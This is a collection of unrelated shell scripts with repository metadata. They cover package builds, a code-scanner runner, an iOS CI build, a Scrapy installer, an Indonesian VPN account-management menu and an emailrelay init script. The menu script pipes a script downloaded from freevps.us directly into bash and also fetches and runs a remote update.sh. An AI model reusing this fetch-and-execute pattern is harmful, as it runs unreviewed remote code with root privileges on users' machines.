cp -R unabto/src/platforms/unabto_common_types.h src/platforms/unabto_common_types.h

# Drop the rest of the submodule checkout.
rm -rf unabto

echo "I'm giving you back your prompt now."
echo
|
d12d329160d7a7d2e179bc22373cc7437b053eed
|
Shell
|
Ponce/slackbuilds
|
/office/adobe-reader/adobe-reader.SlackBuild
|
UTF-8
| 5,110
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Slackware build script for acroread - binary repackaging
# Copyright 2006-2009 Robby Workman Northport, Alabama, USA
# Copyright 2008-2010 Heinz Wiesinger, Amsterdam, The Netherlands
# All rights reserved.
#
# Redistribution and use of this script, with or without modification, is
# permitted provided that the following conditions are met:
#
# 1. Redistributions of this script must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ''AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

# Thanks to Andrew Brouwers for the original SlackBuild script and for
# permission to modify it as needed.

# 20220401 bkw: Modified by SlackBuilds.org, BUILD=2:
# - make desktop file validate.
# - use relative symlinks, not absolute.

cd $(dirname $0) ; CWD=$(pwd)

PRGNAM=adobe-reader
VERSION=${VERSION:-9.5.5}
# SRCARCH/ARCH should stop lint scripts warnings - DW 2023-05-15 18:33:15 +0100
SRCARCH=i486 # Leave this alone for acroread
ARCH=i586
BUILD=${BUILD:-2}
TAG=${TAG:-_SBo}
PKGTYPE=${PKGTYPE:-tgz}

# Use ADOBE_LANG for installing a different language version of acroread
# Moved here so that PRINT_PACKAGE_NAME outputs the correct name
# DW 2023-05-15 18:32:26 +0100
ADOBE_LANG=${ADOBE_LANG:-enu}

if [ ! -z "${PRINT_PACKAGE_NAME}" ]; then
  echo "$PRGNAM-${VERSION}_$ADOBE_LANG-$ARCH-$BUILD$TAG.$PKGTYPE"
  exit 0
fi

TMP=${TMP:-/tmp/SBo}
PKG=$TMP/package-$PRGNAM
OUTPUT=${OUTPUT:-/tmp}

set -e

rm -rf $PKG
mkdir -p $TMP $PKG $OUTPUT
cd $TMP
rm -rf AdobeReader
tar xvf $CWD/AdbeRdr${VERSION}-1_${SRCARCH}linux_${ADOBE_LANG}.tar.bz2
VERSION=${VERSION}_$ADOBE_LANG

# Create directory structure and extract files from archives
mkdir -p $PKG/opt $PKG/usr/bin
cd $PKG/opt
tar xf $TMP/AdobeReader/COMMON.TAR
tar xf $TMP/AdobeReader/ILINXR.TAR
cd $PKG/opt/Adobe

# 20220401 bkw: desktop-file-validate
sed -i -e '/^Caption/d' \
       -e '/^Categories/s,Application;,,' \
       -e 's, *$,,' \
       Reader9/Resource/Support/AdobeReader.desktop

# Remove stuff we don't need
rm -rf Reader9/Reader/HowTo
rm -r Reader9/Browser/{HowTo,install_browser_plugin}

# Add symlink for binary to /usr/bin
( cd $PKG/usr/bin ; ln -sf ../../opt/Adobe/Reader9/bin/acroread . )

# Add symlink for browser plugins
mkdir -p $PKG/usr/lib/mozilla/plugins
cd $PKG/usr/lib/mozilla/plugins
  ln -sf ../../../../opt/Adobe/Reader9/Browser/intellinux/nppdf.so .
cd -

# Add symlink to AdobeReader.xml for correct mimetype
mkdir -p $PKG/usr/share/mime/packages
cd $PKG/usr/share/mime/packages
  ln -sf ../../../../opt/Adobe/Reader9/Resource/Support/AdobeReader.xml .
cd -

# Fix symlink to .desktop file
mkdir -p $PKG/usr/share/{applications,pixmaps}
cd $PKG/usr/share/applications
  ln -sf ../../../opt/Adobe/Reader9/Resource/Support/AdobeReader.desktop .
cd -

# Link icon to /usr/share/pixmaps
cd $PKG/usr/share/pixmaps
  ln -sf ../../../opt/Adobe/Reader9/Resource/Icons/48x48/AdobeReader9.png .
cd -

# Link manpage to /usr/man/man1
mkdir -p $PKG/usr/man/man1
cd $PKG/usr/man/man1
  ln -sf ../../../opt/Adobe/Reader9/Resource/Shell/acroread.1.gz .
cd -

# Fix bug in bash completion script by redefining "_filedir" function
# to "_acroread_filedir" as suggested on the adobe forum:
# http://forums.adobe.com/thread/745833
sed -i 's/_filedir/_acroread_filedir/g' $PKG/opt/Adobe/Reader9/Resource/Shell/acroread_tab

# Link completion script to /usr/share/bash-completion/completions
mkdir -p $PKG/usr/share/bash-completion/completions
ln -sf ../../../../opt/Adobe/Reader9/Resource/Shell/acroread_tab \
  $PKG/usr/share/bash-completion/completions/acroread

# Move docs to their correct locations
mkdir -p $PKG/usr/doc/$PRGNAM-$VERSION
cp -a $TMP/AdobeReader/ReadMe.htm $PKG/usr/doc/$PRGNAM-$VERSION
cat $CWD/$PRGNAM.SlackBuild > $PKG/usr/doc/$PRGNAM-$VERSION/$PRGNAM.SlackBuild

mkdir -p $PKG/install
cat $CWD/slack-desc > $PKG/install/slack-desc
cat $CWD/doinst.sh > $PKG/install/doinst.sh

# Fix ownership and permissions
# (normalize the odd permission bits shipped inside Adobe's tarballs)
cd $PKG
find . -type d -exec chmod 755 {} \;
chown -R root:root .
find -L . \
 \( -perm 777 -o -perm 775 -o -perm 750 -o -perm 711 -o -perm 555 \
  -o -perm 511 \) -exec chmod 755 {} \+ -o \
 \( -perm 666 -o -perm 664 -o -perm 640 -o -perm 600 -o -perm 444 \
  -o -perm 440 -o -perm 400 \) -exec chmod 644 {} \+

# No stripping of binaries and such, as Firefox doesn't like naked acroread :D
# Just build the package... ;P
/sbin/makepkg -p -l y -c n $OUTPUT/$PRGNAM-$VERSION-$ARCH-$BUILD$TAG.$PKGTYPE
| true
|
e29e91acbc71db094de3b96ee0795658aeeb7916
|
Shell
|
yunifyorg/anteaterfw
|
/run_scan.sh
|
UTF-8
| 4,134
| 3.890625
| 4
|
[] |
no_license
|
#!/bin/bash
# Cross platform build environment to run Anteater
#
# Copyright 2016-2017, Ashlee Young. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#     http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

##### Settings #####
VERSION=0.3
AUTHOR="Ashlee Young"
MODIFIED="January 31, 2017"
JAVA_VERSION=1.7 #PMD will not currently build with Java version other than 1.7
ANT_VERSION=1.9.8 #Ant version 1.10.0 and above does not appear to work with Java 1.7
MAVEN_VERSION=3.3.9
MAVENURL="https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/$MAVEN_VERSION/apache-maven-$MAVEN_VERSION-src.tar.gz"
PMD_VERSION=5.5.2
EXPAT_VERSION=2.0.1
RATS_VERSION=2.4
# Directory layout: everything is rooted at the script's CWD; sources are
# unpacked under src/ and built under build/.
export PROJECTROOT=$(pwd)
export BUILDROOT="$PROJECTROOT"/build
export BINROOT="$PROJECTROOT"/bin
export SRCROOT="$PROJECTROOT"/src
export PATCHROOT="$PROJECTROOT"/patches
export CONFIGSROOT="$PROJECTROOT"/configs
export ANTROOT="$BUILDROOT"/ant
export ANT_HOME="$ANTROOT"/apache-ant-$ANT_VERSION
export MAVENROOT="$BUILDROOT"/maven
export M2_HOME=$BUILDROOT/maven/build
export M2=$M2_HOME/bin
export PMDSRC="$SRCROOT"/pmd
export PMDBUILD="$BUILDROOT"/pmd
export ANTEATERSRC="$SRCROOT"/anteater
export ANTEATERBUILD="$BUILDROOT"/anteater
export RATSSRC="$SRCROOT"/rats-"$RATS_VERSION".tgz
export EXPATSRC="$SRCROOT"/expat-"$EXPAT_VERSION".tar.gz
export RATSBUILD="$BUILDROOT"/rats-"$RATS_VERSION"
export EXPATBUILD="$BUILDROOT"/expat-"$EXPAT_VERSION"
export REPOSDIR="$ANTEATERBUILD"/repos
##### End Settings #####
##### Version #####
# Simply function to display versioning information
# Clear the screen and print the script banner (version, last-modified, author),
# then announce the dependency check.
# Globals read: VERSION, MODIFIED, AUTHOR (defined in the settings section).
display_version() {
clear
printf "You are running run_scan.sh script Version: %s \n" "$VERSION"
printf "Last modified on %s, by %s. \n\n" "$MODIFIED" "$AUTHOR"
# Brief pause so the banner is visible before further output scrolls.
sleep 1
printf "Checking build environment dependencies... \n\n"
}
##### End Version #####
##### Ask Function #####
# This is a common function I use for prompting a yes/no response
# Prompt the user with a yes/no question; return 0 for yes, 1 for no.
# Arguments: $1 - question text; $2 - optional default ("Y" or "N").
# Globals: MODE - when set to "auto", the answer is forced to "Y" without
# prompting (used for unattended runs).
# Loops until a reply starting with y/Y or n/N is given.
ask() {
while true; do
if [ "${2:-}" = "Y" ]; then
prompt="Y/n"
default=Y
elif [ "${2:-}" = "N" ]; then
prompt="y/N"
default=N
else
prompt="y/n"
default=
fi
# Ask the question
if [ "$MODE" = "auto" ]; then
REPLY="Y"
else
read -p "$1 [$prompt] " REPLY
fi
# Default?
if [ -z "$REPLY" ]; then
REPLY=$default
fi
# Check if the reply is valid
case "$REPLY" in
Y*|y*) return 0 ;;
N*|n*) return 1 ;;
esac
done
}
##### End Ask Function #####
##### Check for WORKSPACE #####
# The WORKSPACE variable can be set to establish the Jenkins path to where the repos are cloned.
# if not set, the path should be relative to the PROJECTROOT.
# If Jenkins' WORKSPACE variable is exported, make sure anteater.conf
# references it; if not, offer to regenerate the config from the template
# (replacing the REPLACE placeholder with the workspace path).
# Globals read: WORKSPACE, ANTEATERBUILD, CONFIGSROOT.
check_variable() {
if [ -n "${WORKSPACE:-}" ]; then
# -F matches the path literally (a filesystem path is not a regex);
# -c replaces the old `cat file | grep ... | wc -l` pipeline.
check_if_set="$(grep -Fc -- "$WORKSPACE" "$ANTEATERBUILD"/anteater.conf 2>/dev/null)"
if [ ! "${check_if_set:-0}" -gt 0 ]; then
printf "Your WORKSPACE variable is set, but not reflected in your anteater.conf file \n"
if ask "Would you like us to change it?"; then
cp "$CONFIGSROOT"/anteater.conf "$ANTEATERBUILD"
sed -i "s|REPLACE|$WORKSPACE|g" "$ANTEATERBUILD"/anteater.conf
fi
fi
fi
}
##### End Check for WORKSPACE #####
##### Get repo #####
# Run the anteater scan from inside its virtualenv.
# NOTE(review): $1 is captured into `url` but never used, and REPOSDIR is
# created but not populated here -- presumably repos are cloned elsewhere;
# confirm before removing either line.
scan_repo() {
url="$1"
cd "$ANTEATERBUILD"
if [ ! -d "$REPOSDIR" ]; then
mkdir "$REPOSDIR"
fi
# Redundant (already in this directory) but kept as-is.
cd "$ANTEATERBUILD"
source env/bin/activate
anteater scan all
}
##### End Get repo #####
# Entry point: print the banner, sanity-check the WORKSPACE config,
# then run the scan.
main() {
display_version
check_variable
scan_repo
}
main
| true
|
b6f542d5629379b443650e1265b419bbecb90ab3
|
Shell
|
jlyonsmith/build-buddy
|
/sample-scripts/ios/master-build.sh
|
UTF-8
| 2,234
| 3.96875
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
#
# Build script for an iOS project master branch
# Passed in from Build Buddy
if [[ -z "$GIT_REPO_OWNER" || -z "$GIT_REPO_NAME" ]]; then
echo Must set GIT_REPO_OWNER, GIT_REPO_NAME
exit 1
fi
BRANCH=$1
# Configure these for your build
XCODE_WORKSPACE=${GIT_REPO_NAME}.xcworkspace
XCODE_TEST_SCHEME=${GIT_REPO_NAME}
XCODE_ARCHIVE_SCHEME=${GIT_REPO_NAME}
BUILD_DIR=~/Builds
SIMULATOR_CONFIG="platform=iOS Simulator,name=iPhone 6,OS=latest"
XCODEBUILD=$(which xcodebuild)
# Initialize
echo Creating $BUILD_DIR
mkdir -p ${BUILD_DIR}/${GIT_REPO_OWNER}
cd ${BUILD_DIR}/${GIT_REPO_OWNER}
GIT_CLONE_DIR=$BUILD_DIR/$GIT_REPO_OWNER/$GIT_REPO_NAME
if [[ -d $GIT_CLONE_DIR ]]; then
echo Deleting $GIT_CLONE_DIR
rm -rf $GIT_CLONE_DIR
fi
# Pull source
echo Pulling sources to ${BUILD_DIR}/${GIT_REPO_OWNER}/${GIT_REPO_NAME}
git clone git@github.com:${GIT_REPO_OWNER}/${GIT_REPO_NAME}.git ${GIT_REPO_NAME}
# Switch to correct branch
cd ${GIT_REPO_NAME}
git checkout master
# Install Gemfile
echo Pulling Gemfile
bundler install
# Pull Dependencies
echo Pulling Cocopods
bundler exec pod install
# Update the version number
mkdir Scratch
bundle exec vamper -u
TAG_NAME=$(cat Scratch/${GIT_REPO_NAME}.tagname.txt)
TAG_DESCRIPTION=$(cat Scratch/${GIT_REPO_NAME}.tagdesc.txt)
echo New version is $TAG_DESCRIPTION
# Test
if ! $XCODEBUILD -workspace $XCODE_WORKSPACE -scheme "$XCODE_TEST_SCHEME" -sdk iphonesimulator -destination "$SIMULATOR_CONFIG" test; then
echo ERROR: Tests failed
exit 1
fi
# Build Archive
if ! $XCODEBUILD -workspace $XCODE_WORKSPACE -scheme "$XCODE_ARCHIVE_SCHEME" archive; then
echo ERROR: Archive build failed
exit 1
fi
# List of fixes since last tag
LAST_TAG_NAME=$(git tag -l "${BRANCH}*" | tail -1)
if [[ -n "$LAST_TAG_NAME" ]]; then
BUG_FIXES=$(git log --pretty=oneline ${LAST_TAG_NAME}..HEAD | egrep -io 'CM-[0-9]+' | tr '[:lower:]' '[:upper:]' | sort -u | tr "\\n" " ")
echo Bugs fixed since ${LAST_TAG_NAME} - ${BUG_FIXES}
else
echo First build on this branch
fi
# Commit version changes
git add :/
git commit -m "${TAG_DESCRIPTION}" -m "${BUG_FIXES}"
# Add the version tag
echo Adding tag \'${TAG_NAME}\'
git tag -a ${TAG_NAME} -m "${TAG_DESCRIPTION}"
git push --follow-tags
| true
|
2506c946fd076669bdffdd27a1498660d29b7e12
|
Shell
|
bradyhouse/house
|
/fiddles/bash/fiddle-0055-InstallScrapy/script.sh
|
UTF-8
| 537
| 3.640625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
clear;
echo "$0" | sed 's/\.\///g' | awk '{print toupper($0)}'
echo "Bash version ${BASH_VERSION}..."
# Echo 0 when pip3 is available on PATH, -1 otherwise.
# Uses `command -v` (the portable, builtin replacement for `which`).
function isPip3Installed() {
    if command -v pip3 >/dev/null 2>&1
    then
        echo 0
    else
        echo -1
    fi
}
# Install pip3 (via easy_install, needs sudo) only when it is missing.
# Fixed: the original test `[[ ! $(isPip3Installed) ]]` was always false,
# because the helper always prints a non-empty string ("0" or "-1"),
# so pip3 was never installed.  Compare against the "installed" code instead.
function installpip3() {
    if [[ "$(isPip3Installed)" != "0" ]]
    then
        sudo easy_install pip3;
    fi
}
# Install Scrapy system-wide via pip3 (requires sudo and network access).
function install-pip3-scrapy() {
sudo pip3 install scrapy;
}
# Top-level installer: ensure pip3 exists, then install Scrapy with it.
# Fixed: the original guard `[[ ! $(isPip3Installed) ]]` was always false
# (the helper always prints a non-empty string), so installpip3 never ran.
function install() {
    if [[ "$(isPip3Installed)" != "0" ]]
    then
        installpip3;
    fi
    install-pip3-scrapy;
}
| true
|
50c9bfc3c2721f6a1a2c9dd4e05778fbeae7c7b2
|
Shell
|
elhad/cstup
|
/menu
|
UTF-8
| 10,816
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
myip=`ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0' | head -n1`;
myint=`ifconfig | grep -B1 "inet addr:$myip" | head -n1 | awk '{print $1}'`;
flag=0
echo
# Create an SSH/OpenVPN account and print connection details.
# Globals read: uname (account name), pass (password), expdate (expiry date).
# Side effects: adds a system user (no home dir), sets its password and
# expiry, downloads an OpenVPN client template and patches it with this
# host's IP, then prints a summary (final line is Indonesian: "use the
# account wisely").  Requires root and network access.
function create_user() {
useradd -M $uname
echo "$uname:$pass" | chpasswd
usermod -e $expdate $uname
# First non-loopback IPv4 address of this host (old ifconfig output format).
myip=`ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0' | head -n1`;
# sed program that substitutes the template placeholder with our IP.
myip2="s/xxxxxxxxx/$myip/g";
wget -qO /tmp/client.ovpn "https://raw.githubusercontent.com/elhad/cstup/master/1194-client.conf"
# Switch the template from port 1194 to 443 before filling in the IP.
sed -i 's/remote xxxxxxxxx 1194/remote xxxxxxxxx 443/g' /tmp/client.ovpn
sed -i $myip2 /tmp/client.ovpn
echo ""
echo "========================="
echo "Host IP : $myip"
echo "Port : 443/22/80"
echo "Squid : 8080/3128"
echo "========================="
echo "Script by Yujin Barboza , gunakan akun dengan bijak"
echo "========================="
}
# Announce and apply a new expiration date for an account.
# Globals read: uname (account name), expdate (date accepted by usermod -e).
# Fixed: expansions passed to usermod are now quoted so an unusual name or
# date cannot be word-split or glob-expanded.
function renew_user() {
echo "New expiration date for $uname: $expdate...";
usermod -e "$expdate" "$uname"
}
# Remove the account named by the global $uname (requires root).
# Fixed: quoted expansion plus `--` so an odd account name cannot be split
# into multiple arguments or parsed as an option by userdel.
function delete_user(){
userdel -- "$uname"
}
# Print every account whose shadow expiry date has passed.
# Field 8 of /etc/shadow is the expiry in days since the epoch; accounts
# with no expiry set are skipped (equivalent of the old `sed /:$/d`).
# Rewritten to stream the file once instead of re-reading it with
# head|tail for every line (O(n^2)), and without a temp file in /tmp.
# Requires read access to /etc/shadow (root).
function expired_users(){
  local username userexp todaystime
  todaystime=$(date +%s)
  while IFS=: read -r username userexp; do
    [ -n "$userexp" ] || continue
    if [ $(( userexp * 86400 )) -lt "$todaystime" ]; then
      echo "$username"
    fi
  done < <(cut -d: -f1,8 /etc/shadow)
}
# Print every account whose shadow expiry date is still in the future.
# Field 8 of /etc/shadow is the expiry in days since the epoch; accounts
# with no expiry set are skipped (equivalent of the old `sed /:$/d`).
# Rewritten to stream the file once instead of re-reading it with
# head|tail for every line (O(n^2)), and without a temp file in /tmp.
# Requires read access to /etc/shadow (root).
function not_expired_users(){
  local username userexp todaystime
  todaystime=$(date +%s)
  while IFS=: read -r username userexp; do
    [ -n "$userexp" ] || continue
    if [ $(( userexp * 86400 )) -gt "$todaystime" ]; then
      echo "$username"
    fi
  done < <(cut -d: -f1,8 /etc/shadow)
}
# Print traffic totals (Received/Transfered) for the primary interface.
# NOTE(review): relies on the legacy `ifconfig` output format with
# "inet addr:" and "RX bytes" lines -- modern net-tools/iproute2 output
# differs; confirm the target distro before relying on this.
function used_data(){
myip=`ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0' | head -n1`
myint=`ifconfig | grep -B1 "inet addr:$myip" | head -n1 | awk '{print $1}'`
ifconfig $myint | grep "RX bytes" | sed -e 's/ *RX [a-z:0-9]*/Received: /g' | sed -e 's/TX [a-z:0-9]*/\nTransfered: /g'
}
clear
echo "--------------- Selamat datang di Server - IP: $myip ---------------"
cname=$( awk -F: '/model name/ {name=$2} END {print name}' /proc/cpuinfo )
cores=$( awk -F: '/model name/ {core++} END {print core}' /proc/cpuinfo )
freq=$( awk -F: ' /cpu MHz/ {freq=$2} END {print freq}' /proc/cpuinfo )
tram=$( free -m | awk 'NR==2 {print $2}' )
swap=$( free -m | awk 'NR==4 {print $2}' )
up=$(uptime|awk '{ $1=$2=$(NF-6)=$(NF-5)=$(NF-4)=$(NF-3)=$(NF-2)=$(NF-1)=$NF=""; print }')
echo -e "\e[032;1mCPU model:\e[0m $cname"
echo -e "\e[032;1mNumber of cores:\e[0m $cores"
echo -e "\e[032;1mCPU frequency:\e[0m $freq MHz"
echo -e "\e[032;1mTotal amount of ram:\e[0m $tram MB"
echo -e "\e[032;1mTotal amount of swap:\e[0m $swap MB"
echo -e "\e[032;1mSystem uptime:\e[0m $up"
echo -e "\e[032;1mScript by:\e[0m Yujin Barboza | https://overses.net/"
echo "------------------------------------------------------------------------------"
echo "Seputar SSH & OpenVPN"
echo -e "\e[031;1m 1\e[0m) Buat Akun SSH/OpenVPN (\e[34;1muser-add\e[0m)"
echo -e "\e[031;1m 2\e[0m) Generate Akun SSH/OpenVPN (\e[34;1muser-gen\e[0m)"
echo -e "\e[031;1m 3\e[0m) Generate Akun Trial (\e[34;1muser-trial\e[0m)"
echo -e "\e[031;1m 4\e[0m) Ganti Password Akun SSH/VPN (\e[34;1muser-pass\e[0m)"
echo -e "\e[031;1m 5\e[0m) Tambah Masa Aktif Akun SSH/OpenVPN (\e[34;1muser-renew\e[0m)"
echo -e "\e[031;1m 6\e[0m) Hapus Akun SSH/OpenVPN (\e[34;1muser-del\e[0m)"
echo -e "\e[031;1m 7\e[0m) Cek Login Dropbear & OpenSSH (\e[34;1muser-login\e[0m)"
echo -e "\e[031;1m 8\e[0m) Auto Limit Multi Login (\e[34;1mauto-limit\e[0m)"
echo -e "\e[031;1m 9\e[0m) Melihat detail user SSH & OpenVPN (\e[34;1muser-detail\e[0m)"
echo -e "\e[031;1m10\e[0m) Daftar Akun dan Expire Date (\e[34;1muser-list\e[0m)"
echo -e "\e[031;1m11\e[0m) Delete Akun Expire (\e[34;1mdelete-user-expire\e[0m)"
echo -e "\e[031;1m12\e[0m) Kill Multi Login (\e[34;1mauto-kill-user\e[0m)"
echo -e "\e[031;1m13\e[0m) Auto Banned Akun (\e[34;1mbanned-user\e[0m)"
echo -e "\e[031;1m14\e[0m) Unbanned Akun (\e[34;1munbanned-user\e[0m)"
echo -e "\e[031;1m15\e[0m) Mengunci Akun SSH & OpenVPN (\e[34;1muser-lock\e[0m)"
echo -e "\e[031;1m16\e[0m) Membuka user SSH & OpenVPN yang terkunci (\e[34;1muser-unlock\e[0m)"
echo -e "\e[031;1m17\e[0m) Melihat daftar user yang terkick oleh perintah user-limit (\e[34;1mlog-limit\e[0m)"
echo -e "\e[031;1m18\e[0m) Melihat daftar user yang terbanned oleh perintah user-ban (\e[34;1mlog-ban\e[0m)"
echo ""
echo "Seputar PPTP VPN"
echo -e "\e[031;1m19\e[0m) Buat Akun PPTP VPN (\e[34;1muser-add-pptp\e[0m)"
echo -e "\e[031;1m20\e[0m) Hapus Akun PPTP VPN (\e[34;1muser-delete-pptp\e[0m)"
echo -e "\e[031;1m21\e[0m) Lihat Detail Akun PPTP VPN (\e[34;1mdetail-pptp\e[0m)"
echo -e "\e[031;1m22\e[0m) Cek login PPTP VPN (\e[34;1muser-login-pptp\e[0m)"
echo -e "\e[031;1m23\e[0m) Lihat Daftar User PPTP VPN (\e[34;1malluser-pptp\e[0m)"
echo ""
echo "Seputar VPS"
echo -e "\e[031;1m24\e[0m) Cek Lokasi User (\e[34;1mcek-lokasi-user\e[0m)"
echo -e "\e[031;1m25\e[0m) Set Auto Reboot (\e[34;1mauto-reboot\e[0m)"
echo -e "\e[031;1m26\e[0m) Speedtest (\e[34;1mcek-speedttes-vps\e[0m)"
echo -e "\e[031;1m27\e[0m) Cek Ram (\e[34;1mcek-ram\e[0m)"
echo -e "\e[031;1m28\e[0m) Edit Banner (\e[34;1medit-banner\e[0m)"
echo -e "\e[031;1m29\e[0m) Edit Port (\e[34;1medit-port\e[0m)"
echo -e "\e[031;1m30\e[0m) Restart (\e[34;1mrestart\e[0m)"
echo -e "\e[031;1m31\e[0m) Benchmark (\e[34;1mbenchmark\e[0m)"
echo -e "\e[031;1m32\e[0m) Ubah Pasword VPS (\e[34;1mpassword\e[0m)"
echo -e "\e[031;1m33\e[0m) Ubah Hostname VPS (\e[34;1mhostname\e[0m)"
echo -e "\e[031;1m34\e[0m) Reboot Server (\e[34;1mreboot\e[0m)"
echo ""
echo "Update Premium Script"
echo -e "\e[031;1m35\e[0m) Log Install (\e[34;1mlog-install\e[0m)"
echo -e "\e[031;1m36\e[0m) Diagnosa (\e[34;1mdiagnosa\e[0m)"
echo ""
echo -e "\e[031;1m x\e[0m) Exit"
read -p "Masukkan pilihan anda, kemudian tekan tombol ENTER: " option1
case $option1 in
1)
clear
buatakun.sh
;;
2)
clear
generate.sh
;;
3)
clear
trial.sh
;;
4)
clear
userpass.sh
;;
5)
clear
userrenew.sh
;;
6)
clear
userdelete.sh
;;
7)
clear
userlogin.sh
;;
8)
clear
autolimit.sh
;;
9)
clear
userdetail.sh
;;
10)
clear
user-list.sh
;;
11)
clear
deleteuserexpire.sh
;;
12)
clear
#!/bin/bash
# Created by https://www.overses.net
# Dilarang Keras Mengambil/mencuplik/mengcopy sebagian atau seluruh script ini.
# Hak Cipta overses.net (Dilindungi Undang-Undang nomor 19 Tahun 2002)
red='\e[1;31m'
green='\e[0;32m'
NC='\e[0m'
echo "Connecting to overses.net..."
sleep 0.2
echo "Checking Permision..."
sleep 0.3
echo -e "${green}Permission Accepted...${NC}"
sleep 1
echo""
read -p "Isikan Maximal User Login (1-2): " MULTILOGIN
echo " AUTO KILL MULTI LOGIN "
echo "-----------------------------"
autokilluser.sh $MULTILOGIN
autokill.sh $MULTILOGIN
echo "-----------------------------"
echo "AUTO KILL MULTI LOGIN SELESAI"
;;
13)
clear
userban.sh
;;
14)
clear
userunban.sh
;;
15)
clear
userlock.sh
;;
16)
clear
userunlock.sh
;;
17)
clear
loglimit.sh
;;
18)
clear
logban.sh
;;
19)
clear
useraddpptp.sh
;;
20)
clear
userdeletepptp.sh
;;
21)
clear
detailpptp.sh
;;
22)
clear
userloginpptp.sh
;;
23)
clear
alluserpptp.sh
;;
24)
clear
userlogin.sh
echo "Contoh: 49.0.35.16 lalu Enter"
read -p "Ketik Salah Satu Alamat IP User: " userip
curl ipinfo.io/$userip
;;
25)
clear
autoreboot.sh
;;
26)
clear
#!/bin/bash
red='\e[1;31m'
green='\e[0;32m'
blue='\e[1;34m'
NC='\e[0m'
echo "Connecting to overses.net..."
sleep 0.2
echo "Checking Permision..."
sleep 0.3
echo -e "${green}Permission Accepted...${NC}"
sleep 1
echo""
echo "Speed Tes Server"
speedtest.py.sh
echo ""
echo "Script Created by https://www.overses.net"
echo "Terimakasih sudah berlangganan di overses.net"
;;
27)
clear
ram.sh
;;
28)
clear
echo -e "1.) Simpan text (CTRL + X, lalu ketik Y dan tekan Enter) " | tee -a log-install.txt
echo -e "2.) Membatalkan edit text (CTRL + X, lalu ketik N dan tekan Enter)" | tee -a log-install.txt
echo "-----------------------------------------------------------" | tee -a log-install.txt
read -p "Tekan ENTER untuk melanjutkan........................ "
nano /bannerssh
/etc/init.d/dropbear restart
;;
29)
clear
ubahport.sh
;;
30)
clear
restart.sh
;;
31)
clear
wget freevps.us/downloads/bench.sh -O - -o /dev/null|bash
;;
32)
clear
echo "Masukan Password VPS, yang mau diganti :"
passwd
;;
33)
clear
echo "Masukan HOSTNAME VPS, yang mau diganti :"
echo "contoh : " hostname ibnu
;;
34)
clear
reboot
;;
35)
clear
log-install.sh
;;
36)
clear
diagnosa.sh
;;
37)
wget -O update.sh https://raw.githubusercontent.com/elhad/cstup/master/config/update.sh && chmod +x update.sh && ./update.sh
;;
x)
;;
*) menu;;
esac
| true
|
b2dde124ea398fe9f0b4cdd9823deafed71623e2
|
Shell
|
shizonic/packages
|
/mail/emailrelay/files/emailrelay.init
|
UTF-8
| 2,133
| 3.34375
| 3
|
[
"GPL-2.0-only",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/sh /etc/rc.common
START=90
USE_PROCD=1
PROG=/usr/bin/emailrelay
NAME=emailrelay
# procd instance generator for one `emailrelay` UCI config section ($1).
# Reads the section's options, assembles the emailrelay command line and
# registers it with procd (respawn enabled).  Returns 1 -- skipping the
# instance -- when the section is disabled or has no valid mode.
emailrelay_instance()
{
local enabled mode port remote_clients server_tls server_auth extra_cmdline smarthost client_tls client_auth address_verifier domain anonymous
config_get_bool enabled "$1" enabled
config_get mode "$1" mode
config_get port "$1" port
config_get_bool remote_clients "$1" remote_clients
config_get server_tls "$1" server_tls
config_get server_auth "$1" server_auth
config_get extra_cmdline "$1" extra_cmdline
config_get smarthost "$1" smarthost
config_get_bool client_tls "$1" client_tls
config_get client_auth "$1" client_auth
config_get address_verifier "$1" address_verifier
config_get domain "$1" domain
config_get_bool anonymous "$1" anonymous
[ "$enabled" = 0 ] && return 1
procd_open_instance
procd_set_param command "$PROG" --no-daemon
# mode selects how the base command line is built; extra_cmdline is
# appended afterwards in every mode.
case "$mode" in
"server"|\
"proxy")
procd_append_param command "--as-${mode}"
[ -n "$smarthost" ] && procd_append_param command "$smarthost"
[ -n "$port" ] && procd_append_param command --port "$port"
[ "$remote_clients" = 1 ] && procd_append_param command --remote-clients
[ -n "$server_tls" ] && procd_append_param command --server-tls "$server_tls"
[ -n "$server_auth" ] && procd_append_param command --server-auth "$server_auth"
[ "$client_tls" = 1 ] && procd_append_param command --client-tls
[ -n "$client_auth" ] && procd_append_param command --client-auth "$client_auth"
[ -n "$address_verifier" ] && procd_append_param command --address-verifier "$address_verifier"
[ -n "$domain" ] && procd_append_param command --domain "$domain"
